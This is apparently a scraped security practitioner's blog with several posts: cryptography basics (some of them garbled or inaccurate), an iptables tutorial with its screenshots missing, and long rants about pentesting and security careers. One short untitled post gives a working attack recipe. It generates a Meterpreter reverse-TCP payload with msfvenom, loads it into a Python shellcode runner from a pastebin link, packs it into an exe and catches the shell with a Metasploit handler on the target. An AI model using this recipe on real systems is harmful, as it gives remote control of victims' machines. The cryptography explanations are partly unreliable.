Cryptography and Symmetric Key Algorithms
cmdjunkie
Crypto is typically considered the most difficult aspect of information security.  At the same time, it fair to say it's the most important -- especially in today's world.  In this blog I will explore the specifics of Crypto Basics and attempt to break them down into core principles and concepts so they are easy to digest.

The Kerchoff Principle states that all crypto relies on algorithms.  These algorithms dictate how enciphering and deciphering processes are to take place.  The Kerchoff princple is essentially an open-source concept whereas the encryption algorithms are widely available so anyone can examine and test them.  The reason these crypto systems using the Kerchoff Principle are secure is because everything but the key to encrypt and decrypt is made available.

Moving on, to fully understand cryptography, the basics of binary math and logical operations need to be understood.  Binary math is basically boolean math whereas there's a base 10 system where there is an integer from 0 through 9.  This base10 decimal system likely has biological origins as human have 10 fingers for counting. In binary math and ultimately computer science, on (or 1) is True, and off ( zero) is False.

Logical operations consists of boolean operators; AND, OR, NOT, XOR.

  • AND, represented by the ^ symbol, checks to see whether two values are both true

  • OR, represented by the \/ symbol, checks to see whether at least one value is true

  • NOT, represented by - or !, simply reverses the value.  "0 is NOT 1.  1 is NOT 0."

  • XOR, represented by a circle with a plus sign in it, returns true when only one input value is true "If both are false, or both are true, the output is false

Modulo Functions and Modulo math are simply the remainder value left over after division operations are performed.

  • 8 mod 6 = 2

  • 6 mod 8 =6

  • 10 mod 3 = 1

  • 10 mod 2 = 0

  • 32 mod 8 = 0

Pretty easy, right?

One-way functions are mathematical operations that produces output values for each possible combination of inputs, but makes it impossible to retrieve the input values.  It's like having a huge number like 10,718,488,075,259 and trying to figure out what three prime numbers were used to obtain that value. In this example, the huge number is a product of three prime numbers: 17,093; 22,441; and 27,943.

A nonce, is a random number that acts as a placeholder variable in mathematical functions.  It's like having a variable in the middle of your algorithm that changes each time the algorithm is executed.  A common attack in wireless communications is to capture as many Initialization Vector packets as you can to reconstruct the WEP key.  IV's are a nonce in that they are supposed to change every time they are initialized.  Unfortunately, there was no requirement in WEP that people's keys change over time or that people could have different keys, so the same IV's would be bouncing around a wireless network at all times.  Not only that but WEP IV's were only 24 bits long.  This was due to the fact that the FCC limited heavy encryption on wireless networks because they wanted to be able to access them.  They wound up limiting the inital key sizes to 64 bits.  This is is why WEP keys were 40 bits, and their IV's were 24.

The IV attack on WEP was pretty simple.  Because IV's weren't encrypted in transmission, attackers would generate a lot of traffic on a WEP network to generate millions of packets with IV's.  Those IV's were then stripped from the network content, and compared to the rest of the packets on the network to weed out the key as duplicates IV's were found.


Vocabulary
Private Key Cryptosystems:  all participants in the cryptosystem use a shared key.
Public Key Cryptosystems: all participants use their own pair of keys
Cryptography: the art of creating and implementing secret codes and ciphers
Cryptanalysis:  the study of methods to defeat codes and ciphers
Cryptology:  the combination of both cryptography and cryptanalysis


Next Up: Transposition Ciphers, Substitution Ciphers, Block, Stream, and Running Key Ciphers

Linux Server Security: Shutting Down Services
cmdjunkie
---------------- IPTables Crash Course   ----------------------------

It's critical to have an understanding of how to use IPTables, especially in a CTF/Competitive scenario.  Here are a couple of tips and tricks that go a long way:

List current running iptables rules:
$ iptables -L -v

Appending a new rule to iptables:
$ iptables -A INPUT -p tcp --dport 80 -j ACCEPT
   //This rule will allow incoming connections to port 80

Deleting the second rule in iptables:
$ iptables -D INPUT 2
Requires that you know the position in the chain of rules.  The rules read top to bottom.  In this case it's the second rule in the INPUT chain.

Dump all rules


Make rules persistent


You can also insert a rule and replace a rule by specifing a number next to the chain you're modifying.  But let's get back to work.

***************** Demo ****************

To demo this technique, I'm using a Kali box, and a Windows system with nmap.  On the kali box, my iptables configuration looks like this:




I'm going to fire up a python HTTPServer and scan it to show what it looks like from an attackers perspective:



Because there are no rules in place, the open python server port 2121 is easily determined.  Once you apply the REJECT with tcp-reset, it should disappear.



There you have it MWL, Iptables will deem your server and its services inaccessible.  Hit me up if you have questions.

I'll do one on port knocking soon.  

SSE Biblioteca
cmdjunkie
Recently I've been doing some deep thinking on what exactly a security software engineer is.  I read through my past couple of posts and while I've gone on rants about how I want to forge my own path that sits between security, pentesting, and software engineering, I can honestly say that there's no real definitive curricula design that determines what one should focus on to acquire the skills of a security software engineer.

I see the sub-discipline as a technical collection of knowledge that's based on software engineering principles but focused on security concepts, design, and implementation.  To me, security isn't about management, or remediation, or even penetration testing -- or at least it shouldn't be.  It should be about implementing defensible systems from the ground up.  Too often, software vulnerabilities are baked into software solutions because developers and programmers aren't necessarily testing their software as they should.  They're also not building in secure, defensible facets into their solutions because in the development world, delivery is more important than security.

Well let the architects, application developers and programmers have their roles.  The goal is not to replace them, it's to supplement the SDLC process with proven defensible, fault-tolerant, high-integrity components.  It's more than just hacking.  It's more than just pentesting.  I don't believe pentesters add any real value to dev teams or enterprises as a whole.  Security Software Engineers are to be well versed in a variety of computer science disciplines, only they specialize in ensuring confidentiality, integrity, and availability through implementation.

With that being said, I've put together a list of texts and references that should be absolute required reading for a programmer wishing to pursue the sub-discipline of Security Software Engineering.  I'd like to include specific texts, but I feel as though there are a variety of texts out there that each have their pro's and con's.  What I propose is a series of guidelines to assist the aspiring Security Software Engineer in accumulating their own collection SSE references and resources.

Get yourself a book that focuses on:

  • building secure software and secure software practices.

  • operating systems design and implementation

  • computer networking design and architecture

  • TCP/IP sockets and their practical use

  • SSL and TLS encryption design and implementation

  • compiler design / x86 architecture

  • a good algorithm book

  • databases, their design, implementation and management

  • software testing and exploitation

  • penetration testing tools, techniques and procedures

  • linux forensics and incident response

  • windows forensics and incident response

That's pretty much it.  I want to keep it as generic as possible because it should be up to the SSE to determine what programming language they want to use.  The goal is not to learn how to implement something in a specific language or on a specific platform, it's to understand security software engineering well enough to adapt to whatever systems, platforms, or languages development teams use.

One might wonder why I didn't include a code-review guideline, and that's because it's too specific to have as a requirement.  Building secure software and secure software practices should equip the SSE with models that can adapt to any language.  Also, despite my detest for penetrating testing, I included it becuase it's a necessary aspect of SSE.  I just don't think it should stand on its on as a discipline that a career is based on.

I also think it's important for an SSE to have a solid understanding and ability to read a variety of languages.  In fact, I would say it's important that an SSE expose themselves to a variety of languages at the junior college level, as junior college programming classes are ideal when it comes to language familiarity.  They won't delve too much into theory or deep problem solving, but they'll equip an SSE with the ability to apply SSE principles in a multitude of languages on a multitude of platforms.

In fact, I would even go so far as to say that an SSE program should start out as a curriculum that teaches practical programming in a multitude of languages.  This would ensure students are practical practitioners instead of heady consumers of conceptual theory.  I support this position based on the fact that security software engineering is straight forward and not necessarily rooted in applied mathematics.  Security Software Engineering isn't about efficiency, it's about applied confidentiality, integrity, and availability.  It's in essense taking the CISSP and turning it into practical implementations.

SSE Practical Course Requirements

  • C++: Level I

  • C#: Level I

  • C# Level II

  • Java Programming: Level I

  • Java Programming: Level II

  • Android Mobile Programming

  • Intro to Local Area Networks

  • Introduction to Javascripting

  • MYSQL Database

  • Object Oriented Analysis / Design

  • Survey Computer Information Systems

  • Project Management MS Project WIndows

  • College Algebra/Functions

  • Intermediate Algebra

  • Linux Operating System

SSE Conceptual Reading Requirements

  • Building Secure Software: How to Avoid Security Problems the Right Way

  • TCP/IP Sockets in Java: Practical Guide for Programmers

  • Operating Systems Design and Implementation

  • Computer Networks (International Economy Edition)

  • Exploiting Software: How to Break Code

  • SSL and TLS: Designing and Building Secure Systems

  • Crafting a Compiler with C

  • Intel Microprocessors - Pentium Pro Processor Architecture

  • Nine Algorithms that Changed the Future

  • Database Systems: Design, Implementation & Management

SSE Operational Security Reading Requirements

  • Mastering Metasploit: Second Edition

  • NMAP Network Scanning

  • Windows Forensic Analysis

  • Linux Forensics

  • The Tao of Network Security Monitoring

  • Extrusion Detection

Personally, I like to get the real books because I like turning pages and reading from paper.  But by all means, if you can power through reading the conceptual and operational requirements via e-reader or pdf, go for it.  

Swiffer DFIR and Self-Identification
cmdjunkie
I've been patiently waiting for the arrival of a new book I ordered on Amazon; Linux Server Security: Hack and Defend.  Everyday for the last couple of days I hit up my mailbox and look for that notification that there's a package in main office.  That little bugger was supposed to be here yesterday.  But I digress.

My newfound clarity as of late has me harping on quantifable progress by way of effort and time invested --it is because of this that I have such an issue with penetration testing and enterprise security operations.  In a nutshell, I like to not only see progress, but I like to be able to identify irrefutable successes and victories with regard to whatever work is being performed.  I'm sure a lot of this perspective is stemming from the recent frustrations I've had at work.  I simply can't get behind efforts that are meaningless in the longrun.  It's this fundamental principle that has me questioning everything I've worked towards with regard to offensive security and ultimately my role in the security operations department at my job.

So full disclosure; my entire security career was initially based upon my interest in security and not necessarily having legitimate qualifications.  But here's the ruse, what exactly are legitimate qualifications?  Back in 2006, apparently all you had to have was an interest and maybe a 2 year tech degree (like yours truly).  That's what got me in the door and for close to 10 years, I worked as some type of security [analyst | engineer | admin], eventually and recently landing roles as a penetration tester.  BUT FUCK.... what does all of that mean?  What are security skills anyway?  The fact that security is not based on an underlying systematic enterprise where testable explanations and predictions can be made (like a legitimate science), equates to the concept that most efforts put forth in the name of security are just tests, guesses, or trial and error scenarios where real progress cannot be measured.  In a nutshell, the work is unforgiving, never-ending, and impossible to measure with regard to success.  You can't win.... or can you?

Pentesting and Security Operations share this trait of unquantifiable measurements of success.  Sure if you can compromise a system or network during a penetration testing engagement, you can go home (or back to the hotel) happy that you're a badass and you pwned some hapless administrators network.  But what are you really doing to improve security.. or your client's security for that matter?  You're basically just showing that you spend too much time playing with tools and honing a skillset that is ever-so-fleeting in its relevancy.  It's juvenile, and pointless in the grand scheme of things.  A penetration test is more or less worthless because a dedicated attacker will always find a way in due to the fact that real attackers don't have a scope or an engagement window.  So what exactly are pentesters actually selling?  "We'll break in before the skiddies do", which is good enough for most companies, right?  After all, they're not really interested in the security of their network.  They're just trying to check a regulatory compliance box so they don't get dinged come audit season.

Security Operations primarily deals with vulnerabilities and the remediation of those vulnerabilities.  There's often some Risk aspect baked into the reporting, but hell, vulnerability management is basically counting grains of sand at the beach.  Risk based reporting is rooted in some variation (emphasis on the word variation) of the Risk formula:

Risk = (Impact * Probability) / Cost
OR
Risk = Threats * Vulnerabilies * Impact
OR
<Insert dickface security practitioner's custom risk formula here>

There's no real science behind "security operations".  It's just people spinning their wheels, looking at spreadsheets, generating charts and graphs, putting in remediation plans, arguing about remediation windows or reasons why something can't be fixed, or if something should be fixed, or its real impact on whatever is believed to be the most sensitive aspect of an enterprise or private data network.  Yak yak yak bla bla bla.

--

Real, quantifiable security has to be based on a science, and a domain where limits and metrics can be baselined, tested and compared.  But I'm not really concerned with that.  I want to get away from that as much as I possibly can.  This is why there's a phenomenon called InfoSec burnout.  It's the byproduct of indivduals work in this field that can't ever seem to get ahead and make significant progress to generate some level of satisfaction in the work that they do.  You see, without this quantifiable measurement of success, one can never really know how good they are.  This is my problem with security, and it's always been.  When it comes to the work I've done over the last 12 years, I can't say for sure if I'm good at what I do.  I can scan, scrape, metasploit, exfil, infiltrate, crack, hack, and sniff with the best of them, but what are those skills really worth unless you're using them for bad, and not good?  If given a target and goal (and a down payment) without a scope or engagement window, I can do some damage.  But that type of work is hard to come by (right now at least -- corporate espionage anyone).  In the enterprise, sure I've held positions that had me watching the network, but I'm a robot, and all it takes is for Jamie in HR to download some ActiveX plugin to ruin my week.  You can't win.

But I tell you what... programming and development is not the same.  As a programmer, you're on the outside looking in.  Your job is to satisfy customer requirements -- whomever that customer may be.  And lo and behold, security software development is on the rise.  This is the panacea of security work as it sits on the outside and it's rooted in software engineering concepts and principles.  Security Software Developers DO security, they aren't responsible for it.  If a network gets breach and a data is compromised, it's on the security team, not the developers that wrote the software.  This is due to the fact that developers aren't necessarily responsible for the defensibility of their solutions -- until now.  The logic behing security software development and engineering is straight forward; "the communications link between these two components is insecure"... implement strong encryption.  "This entry field is not adequately validated as unexpected behavior can result from various inputs".... improve data validation exception handling, ensuring only XYZ data will be processed.  It doesn't get any more straight forward than that.

Systems analysis for incident response can also be improved by software engineering principles -- in essence designing solutions that can logically analyze a system for indicators of compromise.  System and software are predictable -- people aren't.  This is the fundament aspect of bullshit security operations and offensive security.  It relies on the impossible task of predicting human behavior. --can't be done.

I want to stay away from security work that is based around behavior prediction.  System security is fine by me.  Software security is also fine by me.  Security Software, it's research and development, is fine by me.  Anything else, is just uncivilized.

Now's where's my Linux Security Book??

But for now...
cmdjunkie
At this point I should be hitting they hay, but hey, I don't necessarily have to wake up at a specific time tomorrow so fuck it.

I'm still on the fence with whether or not I should drop the grand on the GPYC cert.  Earlier this week on a team meeting call, I asked my boss if there was any opportunity to get reimbursed on training costs and the like.  He said he would look into it -- just like he says everything else, but never does anything.  Typical.  I can't expect my job to pay for my training or certifications as I don't believe they genuinely care about their employees.  It doesn't matter though.  I've been making some very significant moves in the last couple of months and ultimately I'm just trying to set myself up for my move to San Diego.  Ah yes, the end is near.  So long barron, desert, wasteland.

I'm shutting down my virtual lab -- for now.  I hardly ever use it anymore because I'm just fucking tired of security bullshit.  Have I mentioned that in a previous post?  I think so. The system that houses my virtual lab is a powerhouse and I'm not necessarily putting it to good use.  Tomorrow morning I think i'll push all the code I wrote on those Kali instances to my github account and do some spring cleaning.

I can't help but see this disgust I have for pentesting and security as a... dare I say... sign of maturity?  Hahaha, me mature? Yeah right.  But it's quite possible.  I just don't have it in me to continue to peck and hunt for ways to break shit.  Who the fuck cares.  The skillset is juvenile and worthless -- even if you're making money off of it by security contracting.  I've been there and I've done that and it kinda sticks in my craw that I'm selling a false sense of security to my clients.  How valuable is a week-long penetration test anyway?  What's the real value in it?  It just shows that a moderately skilled attacker couldn't break into your systems in 40-60 hours.  Whoopty doo.  A real attacker doesn't have engagment windows.

But there's a sense of badass-ness, and dangerousness associated with self-identifying as a hacker.  That's probably the draw (and the stay).  But hey, in Trumps America, that type of mentality will get you labeled a terrorist.  Who needs that kind of attention?  Not me.

Apathy Sets In...
cmdjunkie
I just got off a call with my boss, my boss's boss, my boss's boss' boss, and my boss's boss's boss's boss (CIO).  They had questions about the results of an engagement I performed late last year and early into this year.  I had no idea this meeting was going to be held this morning, in fact, I was on my way back from getting coffee from Starbucks when my boss called me up telling me that the call was going on with everyone on it and there were MAJOR descrepancies with the data discovered and the data they already had.

Normally, this type of call would rub me the wrong way, but not this time.  I've gotten to the point where I just simply don't care anymore.  When I got on the call and they started asking me questions, I basically told them that I'm not surprised there were discrepancies in the data because I was forced to expedite the delivery of the findings before the analysis was completed.  No one can argue with that because it's the fucking truth.  I sat on the call, silent and attentive, listening to these imbeciles aggressively make their statements about what's real and factual, and what can and cannot be proven.

When this "project" came up last october, I had no idea it was as urgent and as serious as it eventually turned out to be.  I thought it would be a fun exercise to get to know the network, produce some maps, and discover some EOL systems.  Little did I know it would have as much visibility as it did, run up the chain of command, and have me defending everything I did.  The fact of the matter is, if the IT department was ran with an inkling of information technology/security competancy, I wouldn't have had to waste as much time I did on the engagement itself.  They left it up to me to ultimately highlight the fact that we don't have an inventory system or a reliable method of identifying and decomissioning systems that are out of date.  Yes, they left it up to the scrappy hacker to nail down data that probably gets reported to some regulatory body -- which I'm okay with, but my actions are hardly full encompassing of the entire network.  There's no way I covered all of the enterprise network so I'm sure there were gaps and network ranges I didn't assess.  I had to put together the network ranges to assess myself.  What did they expect?

The reason why I'm not really phased by this is because I'm kind of sick of security operations -- and ultimately working for someone else.  I think it's interesting that security found me, because I never really intended on making a career out of infosec.  I found it just like everyone else did, only I was a programmer that had a significant level of knowledge and interest before infosec blew up the way it did.  Information Security is a joke to me -- in the sense of working for a company in the Security department.  There's so much about it that just makes me cringe, I'm surprised I've been in this field for as long as I have.

As I went to bed last night, it dawned on me that I've been focusing on the wrong things for the longest time.  For all intents and purposes I've been at this professional hacker chase for 11 years (2006).  I know some things, and I can do some things, but where and what does that really get you?  I've spent so much time in front of my systems, tinkering with tools, setting up VM's and attacking them, and I just find myself asking why?  What's the point?

Having been around for as long as I have, I've learned that people are just wired differently -- and roles in technology related fields are no different.  There's a reason why certain people gravitate towards different aspects of technology -- it's because that's the way they're wired.  Network guys go into networking because they like technology, but they're not inventive.  As far as security folk go, auditors and CISSPy types aren't firing up Kali, and pentesters aren't going to go line by line through a massive workbook to validate PCI compliance -- they just aren't wired that way.  There's even a discernable difference between coders, developers, and engineers, but they're more or less wired the same way from a 500 ft. view (please excuse my use of business jargon here).  The point is, it makes sense to capitalize on your innate abilities and talents and steer your skillset and career in that direction.

Anyway, I'm adament in making a complete shift to coding and development -- specifically security related coding and development.  I want nothing to do with the operational aspects of information security.  The field has too many problems that stem from ambiguity and subjectivity.  I've said it before and I'll say it again, there's so science behind information security work and it's so saturated with FUD (fear, uncertainly, and doubt) that those that are decision makers have no idea how to manage a team successfully.  I know where I want to be and that's on the engineering/development side of security.  You can't argue with an application or solution that addresses requirements -- if it works, then it works.

I genuinely hate the idea that I've spent / continue to spend as much time as I do on ridiculous security work when I could be building something.  The problem with security as I've pointed out so many times before is the fact that (time spent != improved security || reduction of risk) and it's bogus.  Security skills are also fleeting, so while you may spend a significant amount of time learning new tools, techniques, and exploits, tomorrow they may be worthless and the only thing gleamed from the time spent learning, maybe the concept of which you were attempting to apply.  How valuable is that?

I stand by my position that programming and development, as well as the concepts and theory behind software engineering are still the most valuable, sought after, and defensible skillsets one can have in the industry.  I think this way because I'd like to believe that once exposed to the underlying core theories and concepts of computation, all other aspects can be easily picked up upon.  This isn't necessarily true because it takes a tech junkie to really step outside of their comfort zone of say, OOP and data structures to and delve into Security and/or WAN technologies.  It just doesn't happen often.

I've found myself constantly at odds and feeling like an outsider in my places of employment over the years.  To many times I found myself in a (security) role that was adversarial to development teams (or network teams).  It's interesting because I think like a programmer so I relate to the developers, but my job was to limit their access or tell them they couldn't do one thing or another.  Too many times I was lumped in with the networking team, or the tie wearing GRC/Risk team because of my role, when in fact I should've been hunkered down in the backroom with the pickle-crunching developers, writing code and optimizing solutions.

It's because of this that I want to leave operational security behind.  There's no way I could ever get away from my interest in information security, I just can't fathom it being my job anymore.  The politics that surround information security, especially in the enterprise, are too much for me to concern myself with.  They get in the way of actual work, and reduce the satisfaction of -- dare I say -- creative security solutions and workarounds that actually improve the technical security posture of daily workflow.  No one see's this because information security is a thankless profession.

It's for the reasons above that I have every intention of forging my own path.  That path being security software engineering.  Like I said, I'll never be able to get away from my experience and undying interest in security.  But the truth is you can't really DO security.  It's not a verb.  I made the corelation before that security is akin to grammar.  You can't do grammar.  You implement grammatical concepts to ensure what you're writing is fully understood.  Everyone should know and understand grammatical concepts -- basics like the use of a period, or capitalizing the first letter of a sentence.

Anyway, I want to DO and BUILD security, and not remain on the surface of its operations by reporting upon findings, or risk levels, or remediation efforts.  I suppose the reason that type of work exists and is tolerated is because those that fill those roles  aren't engineers or don't have the capacity for coding and development.  

Security Economics
cmdjunkie
Considering:
https://pentestmag.com/product/practical-fuzzing-for-pentesters-w34/

Automating Whitebox Testing:
http://www.slideshare.net/NetSPI/fuzzing-and-you-automating-whitebox-testing

Black Markets and Bug Bounties
https://www.engadget.com/2017/02/04/dark-net-black-markets-bug-bounty-programs/

Applied Adversarial Software Development (AASD)

  • Developing Cryptoware

  • Developing C2C Clients and Servers

  • Advanced Discovery and Enumeration Applications


I find that Security and Accounting (as well as Finance/Economics) share a lot of the same core principles.  For example, in Accounting/Finance, there's a concept called the Time Value of Money whereas money in the hand is worth more than a larger amount in the future.  In security, this concept can be applied to Exploits/POC's where a less advanced POC today is worth more than an Exploit/POC in the future.
Time Value of Money (TVM)
Time Value of Exploitation/POC???

Mobile App Idea
cmdjunkie
Develop an application that queues up security videos and podcasts for easy consumption in the car or on the go.

Application name undecided.

(no subject)
cmdjunkie
Generate a meterperter payload:
Grab that pyshell: http://pastebin.com/rrhcGeHh
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 -a x86 -f c
> c:\python27\python.exe ..pyinstaller.py pyshell.py --onefile
OR
> c:\python27\python.exe ..\pyinstaller.py -w -a -F pyshell.py
# run multi-handler
use exploit/multi/handler
set PAYLOAD window/meterpreter/reverse_tcp
set LHOST
exploit


Procedural Recab:
1] Use a python script that loads shellcode into memory and executes it.  Have this handy.
2] Geneate meterpreter shellcode with the appropriate IP (or any other shellcode you want to use) and replace the shellcode in the script.
3] Convert the newly edited script to an exe.
4] Run the multi-handler and execute the exe on the target machine.
5] Execute post-ex procedures (Included by not limited to UPPR)

Rants Gantts and Elephants
cmdjunkie
The problem with the information security industry is the lack of accountability combined with the lack of technical know-how.  More specifically, software companies need to be held accountable for their shitty products and those that are working to "protect organizations" need to be held to higher technical standards.

Over the last couple of years, some of my friends have found thier way into the field and while I'm not one to harp on the success of others, it reminds me of why companies and private networks are insecure in the first place.  Having a couple of certifications doesn't mean you know how to protect a network, or that you can identify an IoC when it's necessary.  Given, they have to start somewhere, but the truth is, they're not in it for the craft, they're in it for the cash.

I really can't stand hearing, "I can't code" or "I'm not about that life" when it comes to coding, pentesting, or the intricacies of DFIR.  I tell some of my friends that to be good (and to be taken seriously) you really have to live and love it.  It's not a 9-5 job, it's 24/7.  It's late nights, it's devouring books, watching a lot of videos; a lot of note taking, testing, setting up VM's, programs, and exploits, and maintaining an organized model to work with it all.  Programming is the same way, but programming differs from security in that the time dedicated to a build more often than not has a positive output.  In security, time worked/invested != progress.  Often, security work is like beating your head against your keyboard until something happens.  Programming/Dev is like being a writer.  You just have to sit down and do it.  Security isn't like that.  It's wide, deep, and requires a top down approach to learn anything new and worthwhile.

I know a lot of "security pro's" who seriously cannot code --and it drives me nuts because all I can think about is the fact that vulnerabilities are based on software flaws.  In security, the age old addage is "Think bad, do good", which is basically an excuse to cash in on the growing demand for offensive skills.  In security, the hacks are taught before anything, in hopes that a practitioner will understand how to detect/defend having learned the attack.  Well, where is this mentality when it comes to security software engineering?

I've been saying it for years; a security software engineering sub-field will be in high demand in the coming years.  Because companies are going to want security professionals that can break AND build.  Unfortunately, the inevitability of the field is the fact that automation WILL eliminate most of the well-paying, in demand jobs of today.  By 2020, pentesting will be completely automated, as well as detection and prevention software that learns and adapts to network traffic and behavior.  This is just a natural progression of the industry and it's going to leave a lot of "security pro's" behind.  Sure, one can rack up the security certifications, but what does that really mean?  I know a nice collection of security pro's that have a laundry list of certifications, but couldn't write a simple HTTP fuzzer if their life depended on it.

Security had a good run over the last 10 years as a young industry that had a lot of growing up to do.  For a while there, anyone could get in, make a good living, and cash in on the growing demand for security skills.  Fortunately, the industry is growing up and the real engineers are stepping in to make some significant changes to our established expectations.  

?

Log in